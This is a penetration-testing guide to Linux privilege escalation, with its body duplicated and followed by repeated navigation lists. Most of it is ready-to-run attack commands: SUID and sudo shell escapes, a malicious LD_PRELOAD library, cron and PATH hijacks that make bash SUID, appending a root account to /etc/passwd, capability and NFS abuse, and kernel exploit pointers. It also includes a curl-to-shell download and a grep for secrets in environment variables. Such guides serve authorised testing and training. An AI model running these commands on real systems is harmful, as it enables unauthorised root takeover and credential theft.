You've got a low-privilege shell. Now what? Linux privilege escalation is one of the most critical skills in penetration testing — systematically identifying misconfigured binaries, writable files, and kernel vulnerabilities that allow you to move from a limited user to root. This guide covers the full methodology.

Initial Enumeration

Run linPEAS / LinEnum. Check id, uname -a, cat /etc/passwd, sudo -l, find / -perm -4000

SUID Binary Exploitation

Find SUID binaries with find / -perm -u=s -type f 2>/dev/null. Check GTFOBins for exploitation.

Sudo Misconfiguration

sudo -l shows (ALL) NOPASSWD commands. Use GTFOBins sudo category for escalation.

Kernel Exploit

Check kernel version with uname -r. Search exploit-db for matching CVEs. Dirty Cow, PwnKit, etc.

Cron Job Abuse

cat /etc/crontab, check /etc/cron.* scripts for world-writable paths. Replace script content with reverse shell.

Initial Enumeration: Know Your Foothold

Before running automated tools, gather manual context:

# Current user and groups
id && whoami

# OS and kernel version (critical for kernel exploits)
uname -a
cat /etc/os-release

# Who else is logged in?
w && last

# What processes are running?
ps aux | grep -v "\[" | head -30

# Network connections and listening services
ss -tlnp
netstat -tlnp 2>/dev/null

# Environment variables (may contain secrets)
env | grep -i "key\|pass\|secret\|token\|api"

Automated Enumeration

Let the tools do the heavy lifting. Run these on the target:

# linpeas.sh — comprehensive Linux PrivEsc Awesome Script
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or download and transfer if outbound HTTP is blocked

# linux-exploit-suggester — kernel CVE matching
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

# LinEnum — traditional enumeration script
./LinEnum.sh -t  # thorough mode

The output will be voluminous. Focus on sections highlighted in red/yellow by linpeas — those indicate high-probability escalation vectors.

SUID Binary Exploitation

SUID (Set User ID) binaries run as their owner, not the calling user. If root owns a SUID binary with a shell escape, you get root:

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Common vulnerable SUID binaries (via GTFOBins)
# bash (rare but devastating)
bash -p  # -p preserves EUID, giving root shell

# find
find . -exec /bin/sh -p \; -quit

# vim
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# nmap (older versions with interactive mode)
nmap --interactive
# Inside nmap: !sh

# awk
awk 'BEGIN {system("/bin/sh -p")}'

# less / more
# While in less, type: !/bin/sh

For every SUID binary you find, check GTFOBins — it catalogs shell escapes for hundreds of Unix binaries. The Privilege Escalation Generator auto-generates GTFOBins commands based on the binaries present on your target.

Sudo Misconfigurations

Always run sudo -l — it shows what commands the current user can run as root without a password:

# Check sudo permissions
sudo -l

# Example output:
# (ALL) NOPASSWD: /usr/bin/vim
# (ALL) NOPASSWD: /usr/bin/find
# (root) NOPASSWD: /usr/bin/python3 /opt/scripts/backup.py

NOPASSWD Exploits

# If sudo vim is allowed:
sudo vim -c ':!/bin/bash'

# If sudo python3 is allowed on a specific script you can modify:
# Add to the script: import os; os.system('/bin/bash')
sudo python3 /opt/scripts/backup.py

# sudo with wildcard (extremely dangerous):
# (ALL) NOPASSWD: /usr/bin/rsync *
sudo rsync -e 'sh -c "sh 0>&2"' 127.0.0.1:/dev/null

LD_PRELOAD Abuse

If env_keep += LD_PRELOAD is set in sudoers:

# Create malicious shared library (shell.c)
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <any_allowed_command>

Cron Job Abuse

Cron jobs running as root are gold if you can modify what they execute:

# View system-wide crontabs
cat /etc/crontab
ls -la /etc/cron.*
cat /etc/cron.d/*

# View user crontabs
crontab -l

# Monitor for new processes to find unlisted cron jobs
watch -n 1 "ps aux | grep -v grep | grep -v watch"
# Or use pspy: https://github.com/DominicBreuker/pspy
./pspy64  # monitors processes without root privileges

Writable Script Abuse

# If a cron job runs /opt/backup.sh and you can write to it:
ls -la /opt/backup.sh  # check if world-writable
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# Wait for cron to run, then:
/bin/bash -p

PATH Manipulation

If a cron script calls binaries without absolute paths and PATH includes a writable directory:

# Cron script contains: cd /tmp && cleanup
# Create a malicious 'cleanup' in a writable directory first in PATH
mkdir -p /tmp/evil && echo '#!/bin/bash
chmod +s /bin/bash' > /tmp/evil/cleanup
chmod +x /tmp/evil/cleanup
# If cron PATH has /tmp/evil before /usr/bin, your fake 'cleanup' runs as root

Writable /etc/passwd

# Check if /etc/passwd is writable (misconfigured systems)
ls -la /etc/passwd

# Generate a password hash
openssl passwd -1 -salt hacker password123

# Append a new root user
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GP0...:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

# Login as new root user
su hacker  # password: password123

Kernel Exploits

Kernel exploits are a last resort — they can crash the system. Match the kernel version first:

# DirtyPipe (CVE-2022-0847) — Linux kernel 5.8 to 5.16.11
# Allows overwriting read-only files, including SUID binaries
uname -r  # check version
# PoC: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

# DirtyCOW (CVE-2016-5195) — very old kernels (2.6.22 to 4.8.3)
# Overwrite /etc/passwd or any read-only SUID binary
# PoC: https://dirtycow.ninja/

Linux Capabilities

Capabilities grant specific root privileges without full SUID. Dangerous ones to look for:

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example dangerous capabilities:
# /usr/bin/python3 cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# /usr/bin/perl cap_setuid+ep
perl -e 'use POSIX; setuid(0); exec "/bin/bash";'

# cap_net_raw — allows raw socket access (pivot network attacks)
# cap_sys_admin — near-root; many kernel operations allowed

NFS No Root Squash

# Check NFS exports on target
cat /etc/exports
# If a share has no_root_squash, you can mount it as root from attacker machine

# On attacker (with root):
showmount -e <target-ip>
mount -o rw,vers=2 <target-ip>:/exported/path /mnt/nfs
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# On target:
/mnt/nfs/bash -p  # root shell

Use the Privilege Escalation Generator to auto-generate commands for your specific target environment. Once you have root, use the TTY Shell Upgrade Tool to stabilize your session for credential dumping and lateral movement.

Initial Enumeration

Run linPEAS / LinEnum. Check id, uname -a, cat /etc/passwd, sudo -l, find / -perm -4000

SUID Binary Exploitation

Find SUID binaries with find / -perm -u=s -type f 2>/dev/null. Check GTFOBins for exploitation.

Sudo Misconfiguration

sudo -l shows (ALL) NOPASSWD commands. Use GTFOBins sudo category for escalation.

Kernel Exploit

Check kernel version with uname -r. Search exploit-db for matching CVEs. Dirty Cow, PwnKit, etc.

Cron Job Abuse

cat /etc/crontab, check /etc/cron.* scripts for world-writable paths. Replace script content with reverse shell.

Initial Enumeration: Know Your Foothold

Before running automated tools, gather manual context:

# Current user and groups
id && whoami

# OS and kernel version (critical for kernel exploits)
uname -a
cat /etc/os-release

# Who else is logged in?
w && last

# What processes are running?
ps aux | grep -v "\[" | head -30

# Network connections and listening services
ss -tlnp
netstat -tlnp 2>/dev/null

# Environment variables (may contain secrets)
env | grep -i "key\|pass\|secret\|token\|api"

Automated Enumeration

Let the tools do the heavy lifting. Run these on the target:

# linpeas.sh — comprehensive Linux PrivEsc Awesome Script
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or download and transfer if outbound HTTP is blocked

# linux-exploit-suggester — kernel CVE matching
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

# LinEnum — traditional enumeration script
./LinEnum.sh -t  # thorough mode

The output will be voluminous. Focus on sections highlighted in red/yellow by linpeas — those indicate high-probability escalation vectors.

SUID Binary Exploitation

SUID (Set User ID) binaries run as their owner, not the calling user. If root owns a SUID binary with a shell escape, you get root:

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Common vulnerable SUID binaries (via GTFOBins)
# bash (rare but devastating)
bash -p  # -p preserves EUID, giving root shell

# find
find . -exec /bin/sh -p \; -quit

# vim
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# nmap (older versions with interactive mode)
nmap --interactive
# Inside nmap: !sh

# awk
awk 'BEGIN {system("/bin/sh -p")}'

# less / more
# While in less, type: !/bin/sh

Sudo Misconfigurations

Always run sudo -l — it shows what commands the current user can run as root without a password:

# Check sudo permissions
sudo -l

# Example output:
# (ALL) NOPASSWD: /usr/bin/vim
# (ALL) NOPASSWD: /usr/bin/find
# (root) NOPASSWD: /usr/bin/python3 /opt/scripts/backup.py

NOPASSWD Exploits

# If sudo vim is allowed:
sudo vim -c ':!/bin/bash'

# If sudo python3 is allowed on a specific script you can modify:
# Add to the script: import os; os.system('/bin/bash')
sudo python3 /opt/scripts/backup.py

# sudo with wildcard (extremely dangerous):
# (ALL) NOPASSWD: /usr/bin/rsync *
sudo rsync -e 'sh -c "sh 0>&2"' 127.0.0.1:/dev/null

LD_PRELOAD Abuse

If env_keep += LD_PRELOAD is set in sudoers:

# Create malicious shared library (shell.c)
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <any_allowed_command>

Cron Job Abuse

Cron jobs running as root are gold if you can modify what they execute:

# View system-wide crontabs
cat /etc/crontab
ls -la /etc/cron.*
cat /etc/cron.d/*

# View user crontabs
crontab -l

# Monitor for new processes to find unlisted cron jobs
watch -n 1 "ps aux | grep -v grep | grep -v watch"
# Or use pspy: https://github.com/DominicBreuker/pspy
./pspy64  # monitors processes without root privileges

Writable Script Abuse

# If a cron job runs /opt/backup.sh and you can write to it:
ls -la /opt/backup.sh  # check if world-writable
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# Wait for cron to run, then:
/bin/bash -p

PATH Manipulation

If a cron script calls binaries without absolute paths and PATH includes a writable directory:

# Cron script contains: cd /tmp && cleanup
# Create a malicious 'cleanup' in a writable directory first in PATH
mkdir -p /tmp/evil && echo '#!/bin/bash
chmod +s /bin/bash' > /tmp/evil/cleanup
chmod +x /tmp/evil/cleanup
# If cron PATH has /tmp/evil before /usr/bin, your fake 'cleanup' runs as root

Writable /etc/passwd

# Check if /etc/passwd is writable (misconfigured systems)
ls -la /etc/passwd

# Generate a password hash
openssl passwd -1 -salt hacker password123

# Append a new root user
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GP0...:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

# Login as new root user
su hacker  # password: password123

Kernel Exploits

Kernel exploits are a last resort — they can crash the system. Match the kernel version first:

# DirtyPipe (CVE-2022-0847) — Linux kernel 5.8 to 5.16.11
# Allows overwriting read-only files, including SUID binaries
uname -r  # check version
# PoC: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

# DirtyCOW (CVE-2016-5195) — very old kernels (2.6.22 to 4.8.3)
# Overwrite /etc/passwd or any read-only SUID binary
# PoC: https://dirtycow.ninja/

Linux Capabilities

Capabilities grant specific root privileges without full SUID. Dangerous ones to look for:

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example dangerous capabilities:
# /usr/bin/python3 cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# /usr/bin/perl cap_setuid+ep
perl -e 'use POSIX; setuid(0); exec "/bin/bash";'

# cap_net_raw — allows raw socket access (pivot network attacks)
# cap_sys_admin — near-root; many kernel operations allowed

NFS No Root Squash

# Check NFS exports on target
cat /etc/exports
# If a share has no_root_squash, you can mount it as root from attacker machine

# On attacker (with root):
showmount -e <target-ip>
mount -o rw,vers=2 <target-ip>:/exported/path /mnt/nfs
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# On target:
/mnt/nfs/bash -p  # root shell

Linux Privilege Escalation: SUID, Sudo Misconfigurations, and Cron Abuse

Initial Enumeration: Know Your Foothold

Automated Enumeration

SUID Binary Exploitation

Sudo Misconfigurations

NOPASSWD Exploits

LD_PRELOAD Abuse

Cron Job Abuse

Writable Script Abuse

PATH Manipulation

Writable /etc/passwd

Kernel Exploits

Linux Capabilities

NFS No Root Squash

Related Articles

Linux Privilege Escalation: SUID, Sudo Misconfigurations, and Cron Abuse

Initial Enumeration: Know Your Foothold

Automated Enumeration

SUID Binary Exploitation

Sudo Misconfigurations

NOPASSWD Exploits

LD_PRELOAD Abuse

Cron Job Abuse

Writable Script Abuse

PATH Manipulation

Writable /etc/passwd

Kernel Exploits

Linux Capabilities

NFS No Root Squash

Related Articles